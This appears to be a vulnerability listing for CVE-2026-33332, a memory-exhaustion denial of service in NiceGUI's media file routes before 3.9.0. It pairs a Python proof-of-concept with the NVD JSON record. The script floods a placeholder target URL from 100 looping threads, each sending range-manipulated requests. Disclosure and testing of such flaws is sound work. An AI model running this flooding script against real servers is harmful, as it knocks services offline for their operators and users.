CVE-2026-33332

import requests import threading # CVE-2026-33332 PoC: NiceGUI DoS via Media File Streaming # This script sends concurrent requests with manipulated query parameters # to force the server to load entire files into memory. TARGET_URL = "http://target-nicegui-app:8000/media/large_video.mp4" def exploit(): while True: try: # Send request with a parameter that attempts to bypass chunked streaming # The specific parameter name implies range manipulation payload = {'range': '0-999999999'} requests.get(TARGET_URL, params=payload, timeout=5) except requests.RequestException: pass # Launch multiple threads to simulate concurrent attack threads = [] for i in range(100): t = threading.Thread(target=exploit) t.daemon = True t.start() threads.append(t) for t in threads: t.join()

{"cve": {"id": "CVE-2026-33332", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:28.743", "lastModified": "2026-03-26T12:58:50.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NiceGUI is a Python-based UI framework. Prior to version 3.9.0, NiceGUI's app.add_media_file() and app.add_media_files() media routes accept a user-controlled query parameter that influences how files are read during streaming. The parameter is passed to the range-response implementation without validation, allowing an attacker to bypass chunked streaming and force the server to load entire files into memory at once. With large media files and concurrent requests, this can lead to excessive memory consumption, degraded performance, or denial of service. This issue has been patched in version 3.9.0."}, {"lang": "es", "value": "NiceGUI es un framework de UI basado en Python. Antes de la versión 3.9.0, las rutas de medios app.add_media_file() y app.add_media_files() de NiceGUI aceptan un parámetro de consulta controlado por el usuario que influye en cómo se leen los archivos durante la transmisión. El parámetro se pasa a la implementación de respuesta de rango sin validación, permitiendo a un atacante eludir la transmisión por bloques y forzar al servidor a cargar archivos completos en la memoria de una sola vez. Con archivos multimedia grandes y solicitudes concurrentes, esto puede llevar a un consumo excesivo de memoria, un rendimiento degradado o denegación de servicio. Este problema ha sido parcheado en la versión 3.9.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zauberzeug:nicegui:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.9.0", "matchCriteriaId": "07FAF148-5DBE-4936-A171-698A309AEE21"}]}]}], "references": [{"url": "https://github.com/zauberzeug/nicegui/commit/9026962b8c4f3f225c98b2fbc35aa6b60cb3495b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zauberzeug/nicegui/releases/tag/v3.9.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-w5g8-5849-vj76", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}